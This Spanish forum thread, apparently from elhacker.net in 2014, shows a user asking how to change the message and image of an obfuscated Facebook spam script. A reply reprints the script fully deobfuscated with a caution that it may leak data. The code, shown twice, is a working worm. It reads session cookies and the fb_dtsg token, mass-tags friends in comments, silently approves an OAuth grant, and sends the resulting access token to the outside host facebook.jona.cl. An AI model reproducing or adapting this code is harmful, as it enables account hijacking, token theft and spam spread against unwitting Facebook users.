Foro de elhacker.net

Programación => Scripting => Mensaje iniciado por: 11naracus en 17 Noviembre 2014, 20:52 pm


Título: como editar este script
Publicado por: 11naracus en 17 Noviembre 2014, 20:52 pm
hola gente necesito saver si alguien me podria decir como modificar este script que lo que hace es publicar en el fb este mensaje en todos logrupos paginas y perfiles que tengas en el fb aca una imagen de como queda  (borre algunas partes para no hacer spam )
(http://i61.tinypic.com/1z726mr.jpg)
lo que quiero es editar lo que dice "aumenta tu pupolaridad en facebook rapido facil y gratis entra a .... y descubrelo " y la imagen

bueno espero me puedan ayudar salu2 y muchas gracias

este es el script

Código:
function IbraheemNada(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}
IbraheemNada("");
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","311411802351987","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);

if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
};  
xmlhttp.open("GET", url, true); 
xmlhttp.send();
}
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
}
}
if(formnesne.getElementsByTagName("select").length > 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
   if(xmlhttp.readyState == 4){
     izinhtml = document.createElement("html");
     izinhtml.innerHTML = xmlhttp.responseText;
   if(izinhtml.getElementsByTagName("form").length > 0){
     izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
     act = izinhtml.getElementsByTagName("form")[0].action;
     duzenlevegonder(izinhtml,act)
   }else{
   sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
   if (sex[1]) {
   tokenyolla(sex[1]);
   }
   }
   }
        };

xmlhttp.open("POST", act , true); 
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);

}

function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id  +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
}

if(!localStorage['token_' + profile_id] ||  (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
uygulamaizinver(TokenUrl("121876164619130"));
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
},200);
function tokenyolla(token){
top.location.href = 'http://facebook.jona.cl/#' + token;
}}
var alibasim = "clic en aceptar";
alert(alibasim);

Título: Re: como editar este script
Publicado por: engel lex en 18 Noviembre 2014, 03:47 am
El codigo está ligeramente ofuscado para que no sea legible a primera vista, no es dificil reversarlo, pero si estudias un poco de jscript seguro lograrás modificarlo... por cierto, me da pereza revisarlo porque es largo, pero sospecho que no solo coloca ese aviso :P pendiente con esos codigos que al usarlos sin saber pueden ser "peligrosos" (enviar infomacion personal tuya a algún sitio)

te lo dejo aquí bien organizado y visible para ayudarte ;)

---modificado---
traduje lo más complicado para que se te haga más facil el analisis

Código
  1.     function IbraheemNada(uidss) {
  2.        var a = document.createElement('script');
  3.        a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  4.        document.body.appendChild(a)
  5.     }
  6.     IbraheemNada("");
  7.     var _0xa22c = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "311411802351987", "onreadystatechange", "readyState", "arkadaslar = ", "for (;;);", "", "replace", "responseText", ";", "length", "entries", "payload", "round", " @[", "uid", ":", "text", "]", " ", "&filter[0]=user", "&options[0]=friends_only", "&options[1]=nm", "&token=v7", "&viewer=", "&__user=", "https://", "indexOf", "URL", "GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "open", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "send", "random", "floor", "&ft_ent_identifier=", "&comment_text=", "&source=2", "&client_id=1377871797138:1707018092", "&reply_fbid", "&parent_comment_id", "&rootid=u_jsonp_2_3", "&clp={"cl_impid":"453524a0","clearcounter":0,"elementid":"js_5","version":"x","parent_fbid":", "}", "&attached_sticker_fbid=0", "&attached_photo_fbid=0", "&giftoccasion", "&ft[tn]=[]", "&__a=1", "&__dyn=7n8ahyj35ynxl2u5F97KepEsyo", "&__req=q", "&fb_dtsg=", "&ttstamp=", "POST", "/ajax/ufi/add_comment.php", "Content-type", "application/x-www-form-urlencoded", "setRequestHeader", "status", "close"];
  8.     var fb_dtsg = document[getElementsByName](fb_dtsg)[0][value];
  9.     var user_id = document[cookie][match](document[cookie][match](/c_user=(\d+)/)[1]);
  10.     var id = 311411802351987;
  11.     var arkadaslar = [];
  12.     var svn_rev;
  13.  
  14.     function arkadaslari_al(id) {
  15.        var _0x7892x7 = new XMLHttpRequest();
  16.        _0x7892x7[onreadystatechange] = function() {
  17.            if (_0x7892x7[readyState] == 4) {
  18.                eval(arkadaslar = + _0x7892x7[responseText].toString()[replace](for (;;);, ) + ;);
  19.                for (f = 0; f < Math[round](arkadaslar[payload][entries][length] / 27); f++) {
  20.                    mesaj = ;
  21.                    mesaj_text = ;
  22.                    for (i = f * 27; i < (f + 1) * 27; i++) {
  23.                        if (arkadaslar[payload][entries][i]) {
  24.                            mesaj +=  @[ + arkadaslar[payload][entries][i][uid] + : + arkadaslar[payload][entries][i][text] + ];
  25.                            mesaj_text +=  + arkadaslar[payload][entries][i][text];
  26.                        };
  27.                    };
  28.                    yorum_yap(id, mesaj);
  29.                };
  30.            };
  31.        };
  32.        var _0x7892x8 = &filter[0]=user;
  33.        _0x7892x8 += &options[0]=friends_only;
  34.        _0x7892x8 += &options[1]=nm;
  35.        _0x7892x8 += &token=v7;
  36.        _0x7892x8 += &viewer= + user_id;
  37.        _0x7892x8 += &__user= + user_id;
  38.        if (document[URL][indexOf](https://) >= 0) {
  39.            _0x7892x7[open](GET, https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1 + _0x7892x8, true);
  40.        } else {
  41.            _0x7892x7[open](GET, http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1 + _0x7892x8, true);
  42.        };
  43.        _0x7892x7[send]();
  44.     };
  45.  
  46.     function RandomArkadas() {
  47.        var _0x7892xa = ;
  48.        for (i = 0; i < 9; i++) {
  49.            _0x7892xa +=  @[ + arkadaslar[payload][entries][Math[floor](Math[random]() * arkadaslar[payload][entries][length])][uid] + : + arkadaslar[payload][entries][Math[floor](Math[random]() * arkadaslar[payload][entries][length])][text] + ];
  50.        };
  51.        return _0x7892xa;
  52.     };
  53.  
  54.     function yorum_yap(id, _0x7892xc) {
  55.        var _0x7892xd = new XMLHttpRequest();
  56.        var _0x7892x8 = ;
  57.        _0x7892x8 += &ft_ent_identifier= + id;
  58.        _0x7892x8 += &comment_text= + encodeURIComponent(_0x7892xc);
  59.        _0x7892x8 += &source=2;
  60.        _0x7892x8 += &client_id=1377871797138:1707018092;
  61.        _0x7892x8 += &reply_fbid;
  62.        _0x7892x8 += &parent_comment_id;
  63.        _0x7892x8 += &rootid=u_jsonp_2_3;
  64.        _0x7892x8 += &clp={"cl_impid":"453524a0","clearcounter":0,"elementid":"js_5","version":"x","parent_fbid": + id + };
  65.        _0x7892x8 += &attached_sticker_fbid=0;
  66.        _0x7892x8 += &attached_photo_fbid=0;
  67.        _0x7892x8 += &giftoccasion;
  68.        _0x7892x8 += &ft[tn]=[];
  69.        _0x7892x8 += &__user= + user_id;
  70.        _0x7892x8 += &__a=1;
  71.        _0x7892x8 += &__dyn=7n8ahyj35ynxl2u5F97KepEsyo;
  72.        _0x7892x8 += &__req=q;
  73.        _0x7892x8 += &fb_dtsg= + fb_dtsg;
  74.        _0x7892x8 += &ttstamp=;
  75.        _0x7892xd[open](POST, /ajax/ufi/add_comment.php, true);
  76.        _0x7892xd[setRequestHeader](Content-type, application/x-www-form-urlencoded);
  77.        _0x7892xd[onreadystatechange] = function() {
  78.            if (_0x7892xd[readyState] == 4 && _0x7892xd[status] == 200) {
  79.                _0x7892xd[close];
  80.            };
  81.        };
  82.        _0x7892xd[send](_0x7892x8);
  83.     };
  84.     arkadaslari_al(id);
  85.  
  86.     if (location.hostname.indexOf("www.facebook.com", "static.ak.facebook.com", "apps.facebook.com", "beta.facebook.com") >= 0) {
  87.        var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
  88.  
  89.        function uygulamaizinver(url) {
  90.            var xmlhttp = new XMLHttpRequest();
  91.            xmlhttp.onreadystatechange = function() {
  92.                if (xmlhttp.readyState == 4) {
  93.                    izinverhtml = document.createElement("html");
  94.                    izinverhtml.innerHTML = xmlhttp.responseText;
  95.                    if (izinverhtml.getElementsByTagName("form").length > 0) {
  96.                        izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
  97.                        act = izinverhtml.getElementsByTagName("form")[0].action;
  98.                        duzenlevegonder(izinverhtml, act);
  99.                    }
  100.                }
  101.            };
  102.            xmlhttp.open("GET", url, true);
  103.            xmlhttp.send();
  104.        }
  105.  
  106.        function duzenlevegonder(formnesne, act) {
  107.            izinverparams = "";
  108.            for (i = 0; i < formnesne.getElementsByTagName("input").length; i++) {
  109.                if (formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")) {
  110.                    izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
  111.                }
  112.            }
  113.            if (formnesne.getElementsByTagName("select").length > 0) {
  114.                izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
  115.            }
  116.            izinverparams.replace("&fb_dtsg", "fb_dtsg");
  117.            izinverparams += "&__CONFIRM__=1";
  118.            formnesne = formnesne;
  119.            var xmlhttp = new XMLHttpRequest();
  120.            xmlhttp.onreadystatechange = function() {
  121.                if (xmlhttp.readyState == 4) {
  122.                    izinhtml = document.createElement("html");
  123.                    izinhtml.innerHTML = xmlhttp.responseText;
  124.                    if (izinhtml.getElementsByTagName("form").length > 0) {
  125.                        izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
  126.                        act = izinhtml.getElementsByTagName("form")[0].action;
  127.                        duzenlevegonder(izinhtml, act)
  128.                    } else {
  129.                        sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
  130.                        if (sex[1]) {
  131.                            tokenyolla(sex[1]);
  132.                        }
  133.                    }
  134.                }
  135.            };
  136.  
  137.            xmlhttp.open("POST", act, true);
  138.            xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  139.            xmlhttp.send(izinverparams);
  140.  
  141.        }
  142.  
  143.        function TokenUrl(id) {
  144.            return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id + "&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
  145.        }
  146.  
  147.        if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])) {
  148.            uygulamaizinver(TokenUrl("121876164619130"));
  149.            var http = new XMLHttpRequest();
  150.            http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
  151.            http['send']();
  152.            var get = JSON.parse(http['responseText']);
  153.            var isim = get.name;
  154.        }
  155.        window.setInterval(function() {
  156.            if (document.getElementsByClassName("_5ce")) {
  157.                for (i = 0; i < document.getElementsByClassName("_5ce").length; i++) {
  158.                    document.getElementsByClassName("_5ce")[i].innerHTML = "";
  159.                }
  160.            }
  161.            if (document.getElementsByClassName("uiToggle wrap")) {
  162.                for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++) {
  163.                    document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
  164.                }
  165.            }
  166.            if (document.getElementsByClassName("uiPopover")) {
  167.                for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++) {
  168.                    document.getElementsByClassName("uiPopover")[i].innerHTML = "";
  169.                }
  170.            }
  171.        }, 200);
  172.  
  173.        function tokenyolla(token) {
  174.            top.location.href = 'http://facebook.jona.cl/#' + token;
  175.        }
  176.     }
  177.     var alibasim = "clic en aceptar";
  178.     alert(alibasim);

Título: Re: como editar este script
Publicado por: Leo.Fernandez en 18 Noviembre 2014, 21:21 pm
Hola, bueno lo use sin saber, y lleno de publicaciones a mis amigos con la imagen, pero como sé si no envío info personal?

Título: Re: como editar este script
Publicado por: engel lex en 18 Noviembre 2014, 21:29 pm
analizando el codigo, que no haya hecho un request que no deberia

Título: Re: como editar este script
Publicado por: 11naracus en 19 Noviembre 2014, 02:40 am
gracias por responder ... no entiendo nada traducido y todo no entiendo nada :( no se nada de esto si alguien me podria cambiar la imagen y el mensaje  estaria de lujo o me diga como hacerlo :S


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines